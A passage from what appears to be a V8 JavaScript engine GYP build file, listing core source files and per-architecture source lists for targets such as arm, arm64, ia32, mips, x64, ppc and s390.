'crankshaft/hydrogen-uint32-analysis.cc',
'crankshaft/hydrogen-uint32-analysis.h',
'crankshaft/hydrogen.cc',
'crankshaft/hydrogen.h',
'crankshaft/lithium-allocator-inl.h',
'crankshaft/lithium-allocator.cc',
'crankshaft/lithium-allocator.h',
'crankshaft/lithium-codegen.cc',
'crankshaft/lithium-codegen.h',
'crankshaft/lithium.cc',
'crankshaft/lithium.h',
'crankshaft/lithium-inl.h',
'crankshaft/typing.cc',
'crankshaft/typing.h',
'crankshaft/unique.h',
'date.cc',
'date.h',
'dateparser-inl.h',
'dateparser.cc',
'dateparser.h',
'debug/debug-coverage.cc',
'debug/debug-coverage.h',
'debug/debug-evaluate.cc',
'debug/debug-evaluate.h',
'debug/debug-interface.h',
'debug/debug-frames.cc',
'debug/debug-frames.h',
'debug/debug-scopes.cc',
'debug/debug-scopes.h',
'debug/debug.cc',
'debug/debug.h',
'debug/interface-types.h',
'debug/liveedit.cc',
'debug/liveedit.h',
'deoptimize-reason.cc',
'deoptimize-reason.h',
'deoptimizer.cc',
'deoptimizer.h',
'disasm.h',
'disassembler.cc',
'disassembler.h',
'diy-fp.cc',
'diy-fp.h',
'double.h',
'dtoa.cc',
'dtoa.h',
'effects.h',
'eh-frame.cc',
'eh-frame.h',
'elements-kind.cc',
'elements-kind.h',
'elements.cc',
'elements.h',
'execution.cc',
'execution.h',
'extensions/externalize-string-extension.cc',
'extensions/externalize-string-extension.h',
'extensions/free-buffer-extension.cc',
'extensions/free-buffer-extension.h',
'extensions/gc-extension.cc',
'extensions/gc-extension.h',
'extensions/ignition-statistics-extension.cc',
'extensions/ignition-statistics-extension.h',
'extensions/statistics-extension.cc',
'extensions/statistics-extension.h',
'extensions/trigger-failure-extension.cc',
'extensions/trigger-failure-extension.h',
'external-reference-table.cc',
'external-reference-table.h',
'factory.cc',
'factory.h',
'fast-dtoa.cc',
'fast-dtoa.h',
'feedback-vector-inl.h',
'feedback-vector.cc',
'feedback-vector.h',
'ffi/ffi-compiler.cc',
'ffi/ffi-compiler.h',
'field-index.h',
'field-index-inl.h',
'field-type.cc',
'field-type.h',
'find-and-replace-pattern.h',
'fixed-dtoa.cc',
'fixed-dtoa.h',
'flag-definitions.h',
'flags.cc',
'flags.h',
'frames-inl.h',
'frames.cc',
'frames.h',
'full-codegen/full-codegen.cc',
'full-codegen/full-codegen.h',
'futex-emulation.cc',
'futex-emulation.h',
'gdb-jit.cc',
'gdb-jit.h',
'global-handles.cc',
'global-handles.h',
'globals.h',
'handles-inl.h',
'handles.cc',
'handles.h',
'heap-symbols.h',
'heap/array-buffer-tracker-inl.h',
'heap/array-buffer-tracker.cc',
'heap/array-buffer-tracker.h',
'heap/code-stats.cc',
'heap/code-stats.h',
'heap/concurrent-marking.cc',
'heap/concurrent-marking.h',
'heap/embedder-tracing.cc',
'heap/embedder-tracing.h',
'heap/memory-reducer.cc',
'heap/memory-reducer.h',
'heap/gc-idle-time-handler.cc',
'heap/gc-idle-time-handler.h',
'heap/gc-tracer.cc',
'heap/gc-tracer.h',
'heap/heap-inl.h',
'heap/heap.cc',
'heap/heap.h',
'heap/incremental-marking-inl.h',
'heap/incremental-marking-job.cc',
'heap/incremental-marking-job.h',
'heap/incremental-marking.cc',
'heap/incremental-marking.h',
'heap/mark-compact-inl.h',
'heap/mark-compact.cc',
'heap/mark-compact.h',
'heap/marking.h',
'heap/object-stats.cc',
'heap/object-stats.h',
'heap/objects-visiting-inl.h',
'heap/objects-visiting.cc',
'heap/objects-visiting.h',
'heap/page-parallel-job.h',
'heap/remembered-set.h',
'heap/scavenge-job.h',
'heap/scavenge-job.cc',
'heap/scavenger-inl.h',
'heap/scavenger.cc',
'heap/scavenger.h',
'heap/slot-set.h',
'heap/spaces-inl.h',
'heap/spaces.cc',
'heap/spaces.h',
'heap/store-buffer.cc',
'heap/store-buffer.h',
'intl.cc',
'intl.h',
'icu_util.cc',
'icu_util.h',
'ic/access-compiler-data.h',
'ic/access-compiler.cc',
'ic/access-compiler.h',
'ic/accessor-assembler.cc',
'ic/accessor-assembler.h',
'ic/binary-op-assembler.cc',
'ic/binary-op-assembler.h',
'ic/call-optimization.cc',
'ic/call-optimization.h',
'ic/handler-compiler.cc',
'ic/handler-compiler.h',
'ic/handler-configuration-inl.h',
'ic/handler-configuration.h',
'ic/ic-inl.h',
'ic/ic-state.cc',
'ic/ic-state.h',
'ic/ic-stats.cc',
'ic/ic-stats.h',
'ic/ic.cc',
'ic/ic.h',
'ic/keyed-store-generic.cc',
'ic/keyed-store-generic.h',
'identity-map.cc',
'identity-map.h',
'interface-descriptors.cc',
'interface-descriptors.h',
'interpreter/bytecodes.cc',
'interpreter/bytecodes.h',
'interpreter/bytecode-array-accessor.cc',
'interpreter/bytecode-array-accessor.h',
'interpreter/bytecode-array-builder.cc',
'interpreter/bytecode-array-builder.h',
'interpreter/bytecode-array-iterator.cc',
'interpreter/bytecode-array-iterator.h',
'interpreter/bytecode-array-random-iterator.cc',
'interpreter/bytecode-array-random-iterator.h',
'interpreter/bytecode-array-writer.cc',
'interpreter/bytecode-array-writer.h',
'interpreter/bytecode-decoder.cc',
'interpreter/bytecode-decoder.h',
'interpreter/bytecode-flags.cc',
'interpreter/bytecode-flags.h',
'interpreter/bytecode-generator.cc',
'interpreter/bytecode-generator.h',
'interpreter/bytecode-label.cc',
'interpreter/bytecode-label.h',
'interpreter/bytecode-node.cc',
'interpreter/bytecode-node.h',
'interpreter/bytecode-operands.cc',
'interpreter/bytecode-operands.h',
'interpreter/bytecode-register.cc',
'interpreter/bytecode-register.h',
'interpreter/bytecode-register-allocator.h',
'interpreter/bytecode-register-optimizer.cc',
'interpreter/bytecode-register-optimizer.h',
'interpreter/bytecode-source-info.cc',
'interpreter/bytecode-source-info.h',
'interpreter/bytecode-traits.h',
'interpreter/constant-array-builder.cc',
'interpreter/constant-array-builder.h',
'interpreter/control-flow-builders.cc',
'interpreter/control-flow-builders.h',
'interpreter/handler-table-builder.cc',
'interpreter/handler-table-builder.h',
'interpreter/interpreter.cc',
'interpreter/interpreter.h',
'interpreter/interpreter-assembler.cc',
'interpreter/interpreter-assembler.h',
'interpreter/interpreter-generator.cc',
'interpreter/interpreter-generator.h',
'interpreter/interpreter-intrinsics.cc',
'interpreter/interpreter-intrinsics.h',
'interpreter/interpreter-intrinsics-generator.cc',
'interpreter/interpreter-intrinsics-generator.h',
'interpreter/setup-interpreter.h',
'interpreter/setup-interpreter-internal.cc',
'isolate-inl.h',
'isolate.cc',
'isolate.h',
'json-parser.cc',
'json-parser.h',
'json-stringifier.cc',
'json-stringifier.h',
'keys.h',
'keys.cc',
'label.h',
'layout-descriptor-inl.h',
'layout-descriptor.cc',
'layout-descriptor.h',
'list-inl.h',
'list.h',
'locked-queue-inl.h',
'locked-queue.h',
'log-inl.h',
'log-utils.cc',
'log-utils.h',
'log.cc',
'log.h',
'lookup-cache-inl.h',
'lookup-cache.cc',
'lookup-cache.h',
'lookup.cc',
'lookup.h',
'map-updater.cc',
'map-updater.h',
'macro-assembler-inl.h',
'macro-assembler.h',
'machine-type.cc',
'machine-type.h',
'managed.h',
'messages.cc',
'messages.h',
'msan.h',
'objects-body-descriptors-inl.h',
'objects-body-descriptors.h',
'objects-debug.cc',
'objects-inl.h',
'objects-printer.cc',
'objects.cc',
'objects.h',
'objects/code-cache.h',
'objects/code-cache-inl.h',
'objects/compilation-cache.h',
'objects/compilation-cache-inl.h',
'objects/descriptor-array.h',
'objects/dictionary.h',
'objects/frame-array.h',
'objects/frame-array-inl.h',
'objects/hash-table.h',
'objects/intl-objects.cc',
'objects/intl-objects-inl.h',
'objects/intl-objects.h',
'objects/literal-objects.cc',
'objects/literal-objects.h',
'objects/module-info.h',
'objects/object-macros.h',
'objects/object-macros-undef.h',
'objects/regexp-match-info.h',
'objects/scope-info.cc',
'objects/scope-info.h',
'objects/string-table.h',
'ostreams.cc',
'ostreams.h',
'parsing/duplicate-finder.h',
'parsing/expression-classifier.h',
'parsing/func-name-inferrer.cc',
'parsing/func-name-inferrer.h',
'parsing/parameter-initializer-rewriter.cc',
'parsing/parameter-initializer-rewriter.h',
'parsing/parse-info.cc',
'parsing/parse-info.h',
'parsing/parser-base.h',
'parsing/parser.cc',
'parsing/parser.h',
'parsing/parsing.cc',
'parsing/parsing.h',
'parsing/pattern-rewriter.cc',
'parsing/preparse-data-format.h',
'parsing/preparse-data.cc',
'parsing/preparse-data.h',
'parsing/preparsed-scope-data.cc',
'parsing/preparsed-scope-data.h',
'parsing/preparser.cc',
'parsing/preparser.h',
'parsing/rewriter.cc',
'parsing/rewriter.h',
'parsing/scanner-character-streams.cc',
'parsing/scanner-character-streams.h',
'parsing/scanner.cc',
'parsing/scanner.h',
'parsing/token.cc',
'parsing/token.h',
'pending-compilation-error-handler.cc',
'pending-compilation-error-handler.h',
'perf-jit.cc',
'perf-jit.h',
'profiler/allocation-tracker.cc',
'profiler/allocation-tracker.h',
'profiler/circular-queue-inl.h',
'profiler/circular-queue.h',
'profiler/cpu-profiler-inl.h',
'profiler/cpu-profiler.cc',
'profiler/cpu-profiler.h',
'profiler/heap-profiler.cc',
'profiler/heap-profiler.h',
'profiler/heap-snapshot-generator-inl.h',
'profiler/heap-snapshot-generator.cc',
'profiler/heap-snapshot-generator.h',
'profiler/profiler-listener.cc',
'profiler/profiler-listener.h',
'profiler/profile-generator-inl.h',
'profiler/profile-generator.cc',
'profiler/profile-generator.h',
'profiler/sampling-heap-profiler.cc',
'profiler/sampling-heap-profiler.h',
'profiler/strings-storage.cc',
'profiler/strings-storage.h',
'profiler/tick-sample.cc',
'profiler/tick-sample.h',
'profiler/tracing-cpu-profiler.cc',
'profiler/tracing-cpu-profiler.h',
'profiler/unbound-queue-inl.h',
'profiler/unbound-queue.h',
'property-descriptor.cc',
'property-descriptor.h',
'property-details.h',
'property.cc',
'property.h',
'prototype.h',
'regexp/bytecodes-irregexp.h',
'regexp/interpreter-irregexp.cc',
'regexp/interpreter-irregexp.h',
'regexp/jsregexp-inl.h',
'regexp/jsregexp.cc',
'regexp/jsregexp.h',
'regexp/regexp-ast.cc',
'regexp/regexp-ast.h',
'regexp/regexp-macro-assembler-irregexp-inl.h',
'regexp/regexp-macro-assembler-irregexp.cc',
'regexp/regexp-macro-assembler-irregexp.h',
'regexp/regexp-macro-assembler-tracer.cc',
'regexp/regexp-macro-assembler-tracer.h',
'regexp/regexp-macro-assembler.cc',
'regexp/regexp-macro-assembler.h',
'regexp/regexp-parser.cc',
'regexp/regexp-parser.h',
'regexp/regexp-stack.cc',
'regexp/regexp-stack.h',
'regexp/regexp-utils.cc',
'regexp/regexp-utils.h',
'register-configuration.cc',
'register-configuration.h',
'runtime-profiler.cc',
'runtime-profiler.h',
'runtime/runtime-array.cc',
'runtime/runtime-atomics.cc',
'runtime/runtime-classes.cc',
'runtime/runtime-collections.cc',
'runtime/runtime-compiler.cc',
'runtime/runtime-date.cc',
'runtime/runtime-debug.cc',
'runtime/runtime-forin.cc',
'runtime/runtime-function.cc',
'runtime/runtime-error.cc',
'runtime/runtime-futex.cc',
'runtime/runtime-generator.cc',
'runtime/runtime-intl.cc',
'runtime/runtime-internal.cc',
'runtime/runtime-interpreter.cc',
'runtime/runtime-literals.cc',
'runtime/runtime-liveedit.cc',
'runtime/runtime-maths.cc',
'runtime/runtime-module.cc',
'runtime/runtime-numbers.cc',
'runtime/runtime-object.cc',
'runtime/runtime-operators.cc',
'runtime/runtime-promise.cc',
'runtime/runtime-proxy.cc',
'runtime/runtime-regexp.cc',
'runtime/runtime-scopes.cc',
'runtime/runtime-strings.cc',
'runtime/runtime-symbol.cc',
'runtime/runtime-test.cc',
'runtime/runtime-typedarray.cc',
'runtime/runtime-utils.h',
'runtime/runtime-wasm.cc',
'runtime/runtime.cc',
'runtime/runtime.h',
'safepoint-table.cc',
'safepoint-table.h',
'setup-isolate.h',
'setup-isolate-full.cc',
'signature.h',
'simulator.h',
'small-pointer-list.h',
'snapshot/code-serializer.cc',
'snapshot/code-serializer.h',
'snapshot/deserializer.cc',
'snapshot/deserializer.h',
'snapshot/natives.h',
'snapshot/natives-common.cc',
'snapshot/partial-serializer.cc',
'snapshot/partial-serializer.h',
'snapshot/serializer.cc',
'snapshot/serializer.h',
'snapshot/serializer-common.cc',
'snapshot/serializer-common.h',
'snapshot/snapshot.h',
'snapshot/snapshot-common.cc',
'snapshot/snapshot-source-sink.cc',
'snapshot/snapshot-source-sink.h',
'snapshot/startup-serializer.cc',
'snapshot/startup-serializer.h',
'source-position-table.cc',
'source-position-table.h',
'source-position.cc',
'source-position.h',
'splay-tree.h',
'splay-tree-inl.h',
'startup-data-util.cc',
'startup-data-util.h',
'string-builder.cc',
'string-builder.h',
'string-case.cc',
'string-case.h',
'string-search.h',
'string-stream.cc',
'string-stream.h',
'strtod.cc',
'strtod.h',
'ic/stub-cache.cc',
'ic/stub-cache.h',
'tracing/trace-event.cc',
'tracing/trace-event.h',
'tracing/traced-value.cc',
'tracing/traced-value.h',
'tracing/tracing-category-observer.cc',
'tracing/tracing-category-observer.h',
'transitions-inl.h',
'transitions.cc',
'transitions.h',
'trap-handler/handler-outside.cc',
'trap-handler/handler-shared.cc',
'trap-handler/trap-handler.h',
'trap-handler/trap-handler-internal.h',
'type-hints.cc',
'type-hints.h',
'type-info.cc',
'type-info.h',
'unicode-inl.h',
'unicode.cc',
'unicode.h',
'unicode-cache-inl.h',
'unicode-cache.h',
'unicode-decoder.cc',
'unicode-decoder.h',
'uri.cc',
'uri.h',
'utils-inl.h',
'utils.cc',
'utils.h',
'v8.cc',
'v8.h',
'v8memory.h',
'v8threads.cc',
'v8threads.h',
'value-serializer.cc',
'value-serializer.h',
'vector.h',
'version.cc',
'version.h',
'visitors.cc',
'visitors.h',
'vm-state-inl.h',
'vm-state.h',
'wasm/decoder.h',
'wasm/function-body-decoder.cc',
'wasm/function-body-decoder.h',
'wasm/function-body-decoder-impl.h',
'wasm/leb-helper.h',
'wasm/local-decl-encoder.cc',
'wasm/local-decl-encoder.h',
'wasm/module-decoder.cc',
'wasm/module-decoder.h',
'wasm/signature-map.cc',
'wasm/signature-map.h',
'wasm/wasm-code-specialization.h',
'wasm/wasm-code-specialization.cc',
'wasm/wasm-debug.cc',
'wasm/wasm-external-refs.cc',
'wasm/wasm-external-refs.h',
'wasm/wasm-js.cc',
'wasm/wasm-js.h',
'wasm/wasm-limits.h',
'wasm/wasm-module.cc',
'wasm/wasm-module.h',
'wasm/wasm-module-builder.cc',
'wasm/wasm-module-builder.h',
'wasm/wasm-interpreter.cc',
'wasm/wasm-interpreter.h',
'wasm/wasm-objects.cc',
'wasm/wasm-objects.h',
'wasm/wasm-opcodes.cc',
'wasm/wasm-opcodes.h',
'wasm/wasm-result.cc',
'wasm/wasm-result.h',
'wasm/wasm-text.cc',
'wasm/wasm-text.h',
'zone/accounting-allocator.cc',
'zone/accounting-allocator.h',
'zone/zone-segment.cc',
'zone/zone-segment.h',
'zone/zone.cc',
'zone/zone.h',
'zone/zone-chunk-list.h',
'zone/zone-segment.cc',
'zone/zone-segment.h',
'zone/zone-allocator.h',
'zone/zone-containers.h',
'zone/zone-handle-set.h',
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
['v8_target_arch=="arm"', {
'sources': [ ### gcmole(arch:arm) ###
'arm/assembler-arm-inl.h',
'arm/assembler-arm.cc',
'arm/assembler-arm.h',
'arm/code-stubs-arm.cc',
'arm/code-stubs-arm.h',
'arm/codegen-arm.cc',
'arm/codegen-arm.h',
'arm/constants-arm.h',
'arm/constants-arm.cc',
'arm/cpu-arm.cc',
'arm/deoptimizer-arm.cc',
'arm/disasm-arm.cc',
'arm/frames-arm.cc',
'arm/frames-arm.h',
'arm/interface-descriptors-arm.cc',
'arm/interface-descriptors-arm.h',
'arm/macro-assembler-arm.cc',
'arm/macro-assembler-arm.h',
'arm/simulator-arm.cc',
'arm/simulator-arm.h',
'arm/eh-frame-arm.cc',
'builtins/arm/builtins-arm.cc',
'compiler/arm/code-generator-arm.cc',
'compiler/arm/instruction-codes-arm.h',
'compiler/arm/instruction-scheduler-arm.cc',
'compiler/arm/instruction-selector-arm.cc',
'compiler/arm/unwinding-info-writer-arm.h',
'compiler/arm/unwinding-info-writer-arm.cc',
'crankshaft/arm/lithium-arm.cc',
'crankshaft/arm/lithium-arm.h',
'crankshaft/arm/lithium-codegen-arm.cc',
'crankshaft/arm/lithium-codegen-arm.h',
'crankshaft/arm/lithium-gap-resolver-arm.cc',
'crankshaft/arm/lithium-gap-resolver-arm.h',
'debug/arm/debug-arm.cc',
'full-codegen/arm/full-codegen-arm.cc',
'ic/arm/access-compiler-arm.cc',
'ic/arm/handler-compiler-arm.cc',
'ic/arm/ic-arm.cc',
'regexp/arm/regexp-macro-assembler-arm.cc',
'regexp/arm/regexp-macro-assembler-arm.h',
],
}],
['v8_target_arch=="arm64"', {
'sources': [ ### gcmole(arch:arm64) ###
'arm64/assembler-arm64.cc',
'arm64/assembler-arm64.h',
'arm64/assembler-arm64-inl.h',
'arm64/codegen-arm64.cc',
'arm64/codegen-arm64.h',
'arm64/code-stubs-arm64.cc',
'arm64/code-stubs-arm64.h',
'arm64/constants-arm64.h',
'arm64/cpu-arm64.cc',
'arm64/decoder-arm64.cc',
'arm64/decoder-arm64.h',
'arm64/decoder-arm64-inl.h',
'arm64/deoptimizer-arm64.cc',
'arm64/disasm-arm64.cc',
'arm64/disasm-arm64.h',
'arm64/frames-arm64.cc',
'arm64/frames-arm64.h',
'arm64/instructions-arm64.cc',
'arm64/instructions-arm64.h',
'arm64/instrument-arm64.cc',
'arm64/instrument-arm64.h',
'arm64/interface-descriptors-arm64.cc',
'arm64/interface-descriptors-arm64.h',
'arm64/macro-assembler-arm64.cc',
'arm64/macro-assembler-arm64.h',
'arm64/macro-assembler-arm64-inl.h',
'arm64/simulator-arm64.cc',
'arm64/simulator-arm64.h',
'arm64/utils-arm64.cc',
'arm64/utils-arm64.h',
'arm64/eh-frame-arm64.cc',
'builtins/arm64/builtins-arm64.cc',
'compiler/arm64/code-generator-arm64.cc',
'compiler/arm64/instruction-codes-arm64.h',
'compiler/arm64/instruction-scheduler-arm64.cc',
'compiler/arm64/instruction-selector-arm64.cc',
'compiler/arm64/unwinding-info-writer-arm64.h',
'compiler/arm64/unwinding-info-writer-arm64.cc',
'crankshaft/arm64/delayed-masm-arm64.cc',
'crankshaft/arm64/delayed-masm-arm64.h',
'crankshaft/arm64/delayed-masm-arm64-inl.h',
'crankshaft/arm64/lithium-arm64.cc',
'crankshaft/arm64/lithium-arm64.h',
'crankshaft/arm64/lithium-codegen-arm64.cc',
'crankshaft/arm64/lithium-codegen-arm64.h',
'crankshaft/arm64/lithium-gap-resolver-arm64.cc',
'crankshaft/arm64/lithium-gap-resolver-arm64.h',
'debug/arm64/debug-arm64.cc',
'full-codegen/arm64/full-codegen-arm64.cc',
'ic/arm64/access-compiler-arm64.cc',
'ic/arm64/handler-compiler-arm64.cc',
'ic/arm64/ic-arm64.cc',
'regexp/arm64/regexp-macro-assembler-arm64.cc',
'regexp/arm64/regexp-macro-assembler-arm64.h',
],
}],
['v8_target_arch=="ia32"', {
'sources': [ ### gcmole(arch:ia32) ###
'ia32/assembler-ia32-inl.h',
'ia32/assembler-ia32.cc',
'ia32/assembler-ia32.h',
'ia32/code-stubs-ia32.cc',
'ia32/code-stubs-ia32.h',
'ia32/codegen-ia32.cc',
'ia32/codegen-ia32.h',
'ia32/cpu-ia32.cc',
'ia32/deoptimizer-ia32.cc',
'ia32/disasm-ia32.cc',
'ia32/frames-ia32.cc',
'ia32/frames-ia32.h',
'ia32/interface-descriptors-ia32.cc',
'ia32/macro-assembler-ia32.cc',
'ia32/macro-assembler-ia32.h',
'ia32/simulator-ia32.cc',
'ia32/simulator-ia32.h',
'ia32/sse-instr.h',
'builtins/ia32/builtins-ia32.cc',
'compiler/ia32/code-generator-ia32.cc',
'compiler/ia32/instruction-codes-ia32.h',
'compiler/ia32/instruction-scheduler-ia32.cc',
'compiler/ia32/instruction-selector-ia32.cc',
'crankshaft/ia32/lithium-codegen-ia32.cc',
'crankshaft/ia32/lithium-codegen-ia32.h',
'crankshaft/ia32/lithium-gap-resolver-ia32.cc',
'crankshaft/ia32/lithium-gap-resolver-ia32.h',
'crankshaft/ia32/lithium-ia32.cc',
'crankshaft/ia32/lithium-ia32.h',
'debug/ia32/debug-ia32.cc',
'full-codegen/ia32/full-codegen-ia32.cc',
'ic/ia32/access-compiler-ia32.cc',
'ic/ia32/handler-compiler-ia32.cc',
'ic/ia32/ic-ia32.cc',
'regexp/ia32/regexp-macro-assembler-ia32.cc',
'regexp/ia32/regexp-macro-assembler-ia32.h',
],
}],
['v8_target_arch=="x87"', {
'sources': [ ### gcmole(arch:x87) ###
'x87/assembler-x87-inl.h',
'x87/assembler-x87.cc',
'x87/assembler-x87.h',
'x87/code-stubs-x87.cc',
'x87/code-stubs-x87.h',
'x87/codegen-x87.cc',
'x87/codegen-x87.h',
'x87/cpu-x87.cc',
'x87/deoptimizer-x87.cc',
'x87/disasm-x87.cc',
'x87/frames-x87.cc',
'x87/frames-x87.h',
'x87/interface-descriptors-x87.cc',
'x87/macro-assembler-x87.cc',
'x87/macro-assembler-x87.h',
'x87/simulator-x87.cc',
'x87/simulator-x87.h',
'builtins/x87/builtins-x87.cc',
'compiler/x87/code-generator-x87.cc',
'compiler/x87/instruction-codes-x87.h',
'compiler/x87/instruction-scheduler-x87.cc',
'compiler/x87/instruction-selector-x87.cc',
'crankshaft/x87/lithium-codegen-x87.cc',
'crankshaft/x87/lithium-codegen-x87.h',
'crankshaft/x87/lithium-gap-resolver-x87.cc',
'crankshaft/x87/lithium-gap-resolver-x87.h',
'crankshaft/x87/lithium-x87.cc',
'crankshaft/x87/lithium-x87.h',
'debug/x87/debug-x87.cc',
'full-codegen/x87/full-codegen-x87.cc',
'ic/x87/access-compiler-x87.cc',
'ic/x87/handler-compiler-x87.cc',
'ic/x87/ic-x87.cc',
'regexp/x87/regexp-macro-assembler-x87.cc',
'regexp/x87/regexp-macro-assembler-x87.h',
],
}],
['v8_target_arch=="mips" or v8_target_arch=="mipsel"', {
'sources': [ ### gcmole(arch:mipsel) ###
'mips/assembler-mips.cc',
'mips/assembler-mips.h',
'mips/assembler-mips-inl.h',
'mips/codegen-mips.cc',
'mips/codegen-mips.h',
'mips/code-stubs-mips.cc',
'mips/code-stubs-mips.h',
'mips/constants-mips.cc',
'mips/constants-mips.h',
'mips/cpu-mips.cc',
'mips/deoptimizer-mips.cc',
'mips/disasm-mips.cc',
'mips/frames-mips.cc',
'mips/frames-mips.h',
'mips/interface-descriptors-mips.cc',
'mips/macro-assembler-mips.cc',
'mips/macro-assembler-mips.h',
'mips/simulator-mips.cc',
'mips/simulator-mips.h',
'builtins/mips/builtins-mips.cc',
'compiler/mips/code-generator-mips.cc',
'compiler/mips/instruction-codes-mips.h',
'compiler/mips/instruction-scheduler-mips.cc',
'compiler/mips/instruction-selector-mips.cc',
'crankshaft/mips/lithium-codegen-mips.cc',
'crankshaft/mips/lithium-codegen-mips.h',
'crankshaft/mips/lithium-gap-resolver-mips.cc',
'crankshaft/mips/lithium-gap-resolver-mips.h',
'crankshaft/mips/lithium-mips.cc',
'crankshaft/mips/lithium-mips.h',
'full-codegen/mips/full-codegen-mips.cc',
'debug/mips/debug-mips.cc',
'ic/mips/access-compiler-mips.cc',
'ic/mips/handler-compiler-mips.cc',
'ic/mips/ic-mips.cc',
'regexp/mips/regexp-macro-assembler-mips.cc',
'regexp/mips/regexp-macro-assembler-mips.h',
],
}],
['v8_target_arch=="mips64" or v8_target_arch=="mips64el"', {
'sources': [ ### gcmole(arch:mips64el) ###
'mips64/assembler-mips64.cc',
'mips64/assembler-mips64.h',
'mips64/assembler-mips64-inl.h',
'mips64/codegen-mips64.cc',
'mips64/codegen-mips64.h',
'mips64/code-stubs-mips64.cc',
'mips64/code-stubs-mips64.h',
'mips64/constants-mips64.cc',
'mips64/constants-mips64.h',
'mips64/cpu-mips64.cc',
'mips64/deoptimizer-mips64.cc',
'mips64/disasm-mips64.cc',
'mips64/frames-mips64.cc',
'mips64/frames-mips64.h',
'mips64/interface-descriptors-mips64.cc',
'mips64/macro-assembler-mips64.cc',
'mips64/macro-assembler-mips64.h',
'mips64/simulator-mips64.cc',
'mips64/simulator-mips64.h',
'builtins/mips64/builtins-mips64.cc',
'compiler/mips64/code-generator-mips64.cc',
'compiler/mips64/instruction-codes-mips64.h',
'compiler/mips64/instruction-scheduler-mips64.cc',
'compiler/mips64/instruction-selector-mips64.cc',
'crankshaft/mips64/lithium-codegen-mips64.cc',
'crankshaft/mips64/lithium-codegen-mips64.h',
'crankshaft/mips64/lithium-gap-resolver-mips64.cc',
'crankshaft/mips64/lithium-gap-resolver-mips64.h',
'crankshaft/mips64/lithium-mips64.cc',
'crankshaft/mips64/lithium-mips64.h',
'debug/mips64/debug-mips64.cc',
'full-codegen/mips64/full-codegen-mips64.cc',
'ic/mips64/access-compiler-mips64.cc',
'ic/mips64/handler-compiler-mips64.cc',
'ic/mips64/ic-mips64.cc',
'regexp/mips64/regexp-macro-assembler-mips64.cc',
'regexp/mips64/regexp-macro-assembler-mips64.h',
],
}],
['v8_target_arch=="x64"', {
'sources': [ ### gcmole(arch:x64) ###
'builtins/x64/builtins-x64.cc',
'compiler/x64/code-generator-x64.cc',
'compiler/x64/instruction-codes-x64.h',
'compiler/x64/instruction-scheduler-x64.cc',
'compiler/x64/instruction-selector-x64.cc',
'compiler/x64/unwinding-info-writer-x64.h',
'compiler/x64/unwinding-info-writer-x64.cc',
'crankshaft/x64/lithium-codegen-x64.cc',
'crankshaft/x64/lithium-codegen-x64.h',
'crankshaft/x64/lithium-gap-resolver-x64.cc',
'crankshaft/x64/lithium-gap-resolver-x64.h',
'crankshaft/x64/lithium-x64.cc',
'crankshaft/x64/lithium-x64.h',
'x64/assembler-x64-inl.h',
'x64/assembler-x64.cc',
'x64/assembler-x64.h',
'x64/code-stubs-x64.cc',
'x64/code-stubs-x64.h',
'x64/codegen-x64.cc',
'x64/codegen-x64.h',
'x64/cpu-x64.cc',
'x64/deoptimizer-x64.cc',
'x64/disasm-x64.cc',
'x64/eh-frame-x64.cc',
'x64/frames-x64.cc',
'x64/frames-x64.h',
'x64/interface-descriptors-x64.cc',
'x64/macro-assembler-x64.cc',
'x64/macro-assembler-x64.h',
'x64/simulator-x64.cc',
'x64/simulator-x64.h',
'x64/sse-instr.h',
'debug/x64/debug-x64.cc',
'full-codegen/x64/full-codegen-x64.cc',
'ic/x64/access-compiler-x64.cc',
'ic/x64/handler-compiler-x64.cc',
'ic/x64/ic-x64.cc',
'regexp/x64/regexp-macro-assembler-x64.cc',
'regexp/x64/regexp-macro-assembler-x64.h',
'third_party/valgrind/valgrind.h',
],
}],
['v8_target_arch=="x64" and OS=="linux"', {
'sources': ['trap-handler/handler-inside.cc']
}],
['v8_target_arch=="ppc" or v8_target_arch=="ppc64"', {
'sources': [ ### gcmole(arch:ppc) ###
'builtins/ppc/builtins-ppc.cc',
'compiler/ppc/code-generator-ppc.cc',
'compiler/ppc/instruction-codes-ppc.h',
'compiler/ppc/instruction-scheduler-ppc.cc',
'compiler/ppc/instruction-selector-ppc.cc',
'crankshaft/ppc/lithium-ppc.cc',
'crankshaft/ppc/lithium-ppc.h',
'crankshaft/ppc/lithium-codegen-ppc.cc',
'crankshaft/ppc/lithium-codegen-ppc.h',
'crankshaft/ppc/lithium-gap-resolver-ppc.cc',
'crankshaft/ppc/lithium-gap-resolver-ppc.h',
'debug/ppc/debug-ppc.cc',
'full-codegen/ppc/full-codegen-ppc.cc',
'ic/ppc/access-compiler-ppc.cc',
'ic/ppc/handler-compiler-ppc.cc',
'ic/ppc/ic-ppc.cc',
'ppc/assembler-ppc-inl.h',
'ppc/assembler-ppc.cc',
'ppc/assembler-ppc.h',
'ppc/code-stubs-ppc.cc',
'ppc/code-stubs-ppc.h',
'ppc/codegen-ppc.cc',
'ppc/codegen-ppc.h',
'ppc/constants-ppc.h',
'ppc/constants-ppc.cc',
'ppc/cpu-ppc.cc',
'ppc/deoptimizer-ppc.cc',
'ppc/disasm-ppc.cc',
'ppc/frames-ppc.cc',
'ppc/frames-ppc.h',
'ppc/interface-descriptors-ppc.cc',
'ppc/macro-assembler-ppc.cc',
'ppc/macro-assembler-ppc.h',
'ppc/simulator-ppc.cc',
'ppc/simulator-ppc.h',
'regexp/ppc/regexp-macro-assembler-ppc.cc',
'regexp/ppc/regexp-macro-assembler-ppc.h',
],
}],
['v8_target_arch=="s390" or v8_target_arch=="s390x"', {
'sources': [ ### gcmole(arch:s390) ###
'builtins/s390/builtins-s390.cc',
'compiler/s390/code-generator-s390.cc',
'compiler/s390/instruction-codes-s390.h',
'compiler/s390/instruction-scheduler-s390.cc',
'compiler/s390/instruction-selector-s390.cc',
'crankshaft/s390/lithium-codegen-s390.cc',
'crankshaft/s390/lithium-codegen-s390.h',
'crankshaft/s390/lithium-gap-resolver-s390.cc',
'crankshaft/s390/lithium-gap-resolver-s390.h',
'crankshaft/s390/lithium-s390.cc',
'crankshaft/s390/lithium-s390.h',
'debug/s390/debug-s390.cc',
'full-codegen/s390/full-codegen-s390.cc',
'ic/s390/access-compiler-s390.cc',
'ic/s390/handler-compiler-s390.cc',
'ic/s390/ic-s390.cc',
'regexp/s390/regexp-macro-assembler-s390.cc',
'regexp/s390/regexp-macro-assembler-s390.h',
's390/assembler-s390.cc',
's390/assembler-s390.h',
's390/assembler-s390-inl.h',
's390/codegen-s390.cc',
's390/codegen-s390.h',
